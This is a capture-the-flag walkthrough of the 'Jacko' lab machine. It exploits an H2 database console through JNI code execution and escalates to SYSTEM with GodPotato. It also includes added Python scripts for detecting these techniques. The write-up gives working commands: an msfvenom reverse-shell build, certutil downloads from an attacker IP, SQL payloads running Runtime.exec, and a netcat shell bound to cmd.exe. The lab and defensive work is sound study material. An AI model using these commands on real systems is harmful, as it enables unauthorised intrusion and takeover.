In this walkthrough, we will be going through the Jacko room from Proving Grounds. This room is rated as Intermediate on the platform and it consists of exploiting a running H2 Database instance via JNI code execution. For privilege escalation, we have two routes: either exploit a particular version of PaperStream IP, or use Potato exploits to get root. So, let’s get started without any delay.
Machine Info:

| Field | Value |
| --- | --- |
| Title | Jacko |
| IP address | 192.168.229.66 |
| Difficulty | Intermediate |
| OS | Windows |
| Description | Jacko is an Intermediate-level Windows machine which is vulnerable to JNI code execution in a running H2 Database instance. The privilege escalation has two routes: either exploit a particular version of PaperStream IP, or use Potato exploits to get root. |
Enumeration:
- I started off with a regular aggressive nmap scan and a full TCP port scan. Found multiple open ports on the target; the interesting ones are 80 (HTTP), 139/445 (SMB) and 8082 (HTTP).
$ sudo nmap -A 192.168.229.66
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-12 19:11 IST
Nmap scan report for 192.168.229.66
Host is up (0.17s latency).
Not shown: 994 closed ports
PORT     STATE    SERVICE       VERSION
53/tcp   filtered domain
80/tcp   open     http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: H2 Database Engine (redirect)
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open     microsoft-ds?
8082/tcp open     http          H2 database http console
|_http-title: H2 Console
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/12%OT=80%CT=1%CU=43781%PV=Y%DS=4%DC=T%G=Y%TM=65CA206
OS:6%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=108%TS=U)OPS(O1=M54ENW8NNS%
OS:O2=M54ENW8NNS%O3=M54ENW8%O4=M54ENW8NNS%O5=M54ENW8NNS%O6=M54ENNS)WIN(W1=F
OS:FFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M
OS:54ENW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T
OS:4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y
OS:%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=5378%RUD=G)IE(R=N)

Network Distance: 4 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-02-12T13:42:48
|_  start_date: N/A

TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   169.79 ms 192.168.45.1
2   169.76 ms 192.168.45.254
3   170.60 ms 192.168.251.1
4   170.59 ms 192.168.229.66

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.07 seconds
sudo nmap -sS -p- -T5 192.168.229.66
- Enumerating the web application on port 80 reveals an H2 Database Engine welcome page.
- Next, accessing the web server on port 8082 reveals the login panel for the H2 Database Engine console.
- I tried a blank password with the default username and it logged me in.
- We are now presented with a SQL statement input field. I used the SQL statement below to test whether we can read the contents of the Windows hosts file (the equivalent of /etc/hosts), and it worked.
SELECT FILE_READ('C:/WINDOWS/System32/drivers/etc/hosts',NULL);
Initial Access:
- I looked online for any known exploits related to the running H2 Database version and found a JNI code execution exploit. I used the commands listed in the exploit below and got successful command execution on the target.
Exploit: https://www.exploit-db.com/exploits/49384
- Next, to turn the code execution into a full-blown shell, we first have to create a reverse shell binary using msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.166 LPORT=8082 -f exe > revshell.exe
- Now, we will download the payload onto the target using certutil.
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil.exe -urlcache -f http://192.168.45.166:8000/revshell.exe c:/windows/temp/revshell.exe").getInputStream()).useDelimiter("\\Z").next()');
- At last, execute the payload using the below command. This will grant us a reverse shell back at our netcat listener.
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c C:/Windows/Temp/revshell.exe").getInputStream()).useDelimiter("\\Z").next()');
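The two primitives used above (FILE_READ and CREATE ALIAS bound to arbitrary Java) are exactly what a defender who runs an H2 console should be looking for in the statements it accepts. The script below is an added example, not code from the original post or from H2: it assumes you already capture the SQL submitted to the console (for instance through H2's trace log or a reverse proxy in front of port 8082) and feed it in as text. The sample submissions are constructed, with the documentation address 192.0.2.10 in place of a real host, and the splitter handles the two-statements-on-one-line form the console accepts.

```python
"""Audit SQL submitted to the H2 console for file-read and Java-execution
primitives. Added example; assumes submitted statements are captured as text."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# CREATE ALIAS binds a SQL-callable name to a Java method; the target is
# attacker-controlled, so every alias creation is reported with its target.
ALIAS_RE = re.compile(
    r'\bCREATE\s+ALIAS\s+(?:IF\s+NOT\s+EXISTS\s+)?(?P<alias>\w+)\s+FOR\s+"(?P<target>[^"]+)"',
    re.IGNORECASE,
)

# Content rules: (label, pattern). Only primitives seen in the walkthrough are
# listed; extend the list for your own environment.
RULES = [
    ("FILE_READ call", re.compile(r"\bFILE_READ\s*\(", re.IGNORECASE)),
    ("Java Runtime.exec in SQL", re.compile(r"java\.lang\.Runtime\b.*?\.exec\s*\(", re.IGNORECASE | re.DOTALL)),
    ("certutil download in SQL", re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache", re.IGNORECASE | re.DOTALL)),
]


@dataclass
class Finding:
    statement: str
    reasons: List[str] = field(default_factory=list)
    alias_target: Optional[str] = None


def split_statements(sql_text: str) -> List[str]:
    """Split a submission on ';' outside quotes, so each statement is audited alone."""
    statements, buf, quote = [], [], None
    for ch in sql_text:
        if quote:                      # inside a quoted literal: copy until it closes
            buf.append(ch)
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
            buf.append(ch)
        elif ch == ";":
            stmt = "".join(buf).strip()
            if stmt:
                statements.append(stmt)
            buf = []
        else:
            buf.append(ch)
    tail = "".join(buf).strip()
    if tail:
        statements.append(tail)
    return statements


def audit(sql_text: str) -> List[Finding]:
    """Return one Finding per statement that matches the alias rule or a content rule."""
    findings = []
    for stmt in split_statements(sql_text):
        reasons, target = [], None
        m = ALIAS_RE.search(stmt)
        if m:
            target = m.group("target")
            reasons.append(f"CREATE ALIAS binds {m.group('alias')} to Java target {target}")
        reasons.extend(label for label, pattern in RULES if pattern.search(stmt))
        if reasons:
            findings.append(Finding(stmt, reasons, target))
    return findings


# Constructed sample submissions: one benign query, then the two primitives from
# the walkthrough. 192.0.2.10 is a documentation address, not a real host.
SAMPLE_SUBMISSIONS = [
    "SELECT * FROM INFORMATION_SCHEMA.TABLES;",
    "SELECT FILE_READ('C:/WINDOWS/System32/drivers/etc/hosts',NULL);",
    r"""CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil.exe -urlcache -f http://192.0.2.10:8000/stage.exe c:/windows/temp/stage.exe").getInputStream()).useDelimiter("\\Z").next()');""",
]

if __name__ == "__main__":
    for submission in SAMPLE_SUBMISSIONS:
        for f in audit(submission):
            print(f"ALERT: {'; '.join(f.reasons)}\n    {f.statement[:100]}")
```

Any CREATE ALIAS from a console session is worth an alert on its own: legitimate applications register their Java functions at deployment time, not interactively through the web console.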
- Captured the local flag on user Tony’s Desktop.
- The shell is a little clumsy. Stabilize it with the one-liner below, which sets PATH so that the system32 tools and PowerShell can be found.
set PATH=%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\system32\windowspowershell\v1.0\;
Privilege Escalation:
- Further, I looked into the applications installed on the target and found an interesting one: PaperStream IP.
dir "C:\Program Files (x86)"
- I looked inside the application folder and peeked into the readmeenu.rtf file, which gives the version of PaperStream IP installed.
cd TWAIN
type readmeenu.rtf
PaperStream IP driver 1.42
- I looked online for any known exploit and found a local privilege escalation exploit for that version. I performed the setup required by the exploit, downloaded the DLL to the target and executed the exploit; however, it didn’t grant me a shell. Strange!
Exploit: https://www.exploit-db.com/exploits/49382
msfvenom -p windows/x64/shell_reverse_tcp -f dll -o UninOldIS.dll LHOST=192.168.45.152 LPORT=445
certutil.exe -urlcache -f http://192.168.45.152:8000/UninOldIS.dll C:\Windows\Temp\UninOldIS.dll
certutil.exe -urlcache -f http://192.168.45.152:8000/49382.ps1 c:/Users/tony/Desktop/49382.ps1
- As per my previous enumeration, I knew that the current user has SeImpersonatePrivilege set, which makes it a candidate for Potato exploits. I used the GodPotato exploit below.
GodPotato exploit: https://github.com/BeichenDream/GodPotato/releases
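The privilege check that makes the Potato route viable is the same check a defender should run over service accounts before an attacker does. The script below is an added example, not code from the original post: it parses the text that `whoami /priv` prints (the sample output is constructed) and reports whether the token holds SeImpersonatePrivilege, regardless of whether it is currently enabled.

```python
"""Parse `whoami /priv` output and report token-impersonation exposure.
Added example; assumes the command output has been captured as text."""
import re
from typing import Dict, List

# Privileges that make an account a candidate for token-impersonation abuse.
# Only the one named in the walkthrough is listed; extend for your environment.
IMPERSONATION_PRIVILEGES = {"SeImpersonatePrivilege"}

# Each row: privilege name, free-text description, then Enabled/Disabled.
PRIV_ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_privileges(output: str) -> Dict[str, bool]:
    """Map privilege name -> True if its current state is Enabled."""
    privileges = {}
    for line in output.splitlines():
        m = PRIV_ROW.match(line.strip())
        if m:
            privileges[m.group(1)] = m.group(3) == "Enabled"
    return privileges


def impersonation_risk(privileges: Dict[str, bool]) -> List[str]:
    """Privileges of concern that the token holds. State is deliberately ignored:
    a Disabled privilege is still held and a process can enable it for itself,
    so it counts as exposure either way."""
    return sorted(p for p in privileges if p in IMPERSONATION_PRIVILEGES)


# Constructed sample output in the layout whoami /priv uses.
SAMPLE_OUTPUT = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

if __name__ == "__main__":
    privs = parse_privileges(SAMPLE_OUTPUT)
    print(f"{len(privs)} privileges held, {sum(privs.values())} enabled")
    for p in impersonation_risk(privs):
        print(f"review the account configuration: token holds {p}")
```

Run this against the output collected from each service account on a host; an account that holds the privilege but does not need to impersonate clients should have it removed through the local security policy.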
- Downloaded the exploit onto the target and executed it with netcat to get a reverse shell at my listener on port 4444.
certutil.exe -urlcache -f http://192.168.45.152:8000/GodPotato-NET4.exe c:/Users/tony/Desktop/Godpotato.exe
certutil.exe -urlcache -f http://192.168.45.152:8000/nc.exe c:/Users/tony/Desktop/nc.exe
Godpotato.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.152 4444"
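Every step of this chain leaves a process-creation event behind: java.exe spawning certutil.exe and cmd.exe for the H2 stage, certutil fetching over HTTP, nc.exe started with -e, and finally a SYSTEM child of a binary sitting in a user's Desktop folder. The script below is an added example, not code from the original post: it assumes events have already been normalized from Sysmon Event ID 1 or Security 4688 into the four fields used here, and all sample events are constructed (the hostname JACKO, the Java install path and the address 192.0.2.10 are made up).

```python
"""Triage Windows process-creation events for the tradecraft seen in this
walkthrough. Added example; input is a list of normalized events."""
import re
from typing import Callable, Dict, List, Optional, Tuple

Event = Dict[str, str]
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-case file name of a Windows path, tolerating forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_certutil_download(ev: Event) -> Optional[str]:
    cl = ev["CommandLine"].lower()
    if basename(ev["Image"]) == "certutil.exe" and "-urlcache" in cl and URL_RE.search(cl):
        return "certutil used as a downloader (-urlcache with a URL)"
    return None


def rule_netcat_exec(ev: Event) -> Optional[str]:
    # -e hands the socket to a program; the walkthrough passes cmd.exe.
    if basename(ev["Image"]) in {"nc.exe", "nc64.exe", "ncat.exe"} and re.search(r"\s-e\s", ev["CommandLine"]):
        return "netcat launched with -e (program bound to a network socket)"
    return None


def rule_database_spawns_interpreter(ev: Event) -> Optional[str]:
    # H2 runs inside java.exe; Runtime.exec from SQL shows up as java.exe -> cmd.exe/certutil.exe.
    parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
    if parent in {"java.exe", "javaw.exe"} and child in {"cmd.exe", "powershell.exe", "certutil.exe"}:
        return f"{parent} spawned {child}: command execution from the database process"
    return None


def rule_system_child_of_profile_binary(ev: Event) -> Optional[str]:
    # Potato-style escalation: a binary dropped under C:\Users ends up with a SYSTEM child.
    if ev["User"].upper() == "NT AUTHORITY\\SYSTEM" and ev["ParentImage"].lower().startswith("c:\\users\\"):
        return "SYSTEM process whose parent binary lives in a user profile"
    return None


RULES: List[Callable[[Event], Optional[str]]] = [
    rule_certutil_download,
    rule_netcat_exec,
    rule_database_spawns_interpreter,
    rule_system_child_of_profile_binary,
]


def triage(events: List[Event]) -> List[Tuple[int, List[str]]]:
    """Return (event index, matched reasons) for every event that trips a rule."""
    hits = []
    for idx, ev in enumerate(events):
        reasons = [r for r in (rule(ev) for rule in RULES) if r]
        if reasons:
            hits.append((idx, reasons))
    return hits


# Constructed sample events; field names follow Sysmon.
SAMPLE_EVENTS: List[Event] = [
    {"Image": "C:\\Windows\\System32\\svchost.exe", "ParentImage": "C:\\Windows\\System32\\services.exe",
     "CommandLine": "svchost.exe -k netsvcs", "User": "NT AUTHORITY\\SYSTEM"},
    {"Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Program Files\\Java\\jre\\bin\\java.exe",
     "CommandLine": "certutil.exe -urlcache -f http://192.0.2.10:8000/stage.exe c:/windows/temp/stage.exe",
     "User": "JACKO\\tony"},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files\\Java\\jre\\bin\\java.exe",
     "CommandLine": "cmd.exe /c C:/Windows/Temp/stage.exe", "User": "JACKO\\tony"},
    {"Image": "C:\\Users\\tony\\Desktop\\nc.exe", "ParentImage": "C:\\Users\\tony\\Desktop\\tool.exe",
     "CommandLine": "nc.exe -t -e C:\\Windows\\System32\\cmd.exe 192.0.2.10 4444", "User": "NT AUTHORITY\\SYSTEM"},
    {"Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "certutil.exe -hashfile C:\\setup.msi SHA256", "User": "JACKO\\tony"},
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['CommandLine']}")
        for r in reasons:
            print(f"    - {r}")
```

The last sample event shows why the certutil rule requires both -urlcache and a URL: certutil has legitimate local uses such as hashing a file, and alerting on the binary name alone produces noise.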
- Got the connection back as Administrator. Finally, captured the root flag and marked the machine as complete.
Conclusion:
So that was “Jacko” for you. We started off with a regular nmap scan and found multiple open ports on the target; the interesting ones were 80 (HTTP), 139/445 (SMB) and 8082 (HTTP). Enumerating the web server on port 8082 revealed a login panel for the H2 Database Engine. A blank password with the default username got us logged in. Looking online for known exploits for the running H2 Database version turned up a JNI code execution exploit, which we used to get initial access on the target. For privilege escalation, we had two routes: exploit a particular version of PaperStream IP, or use Potato exploits to get root. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.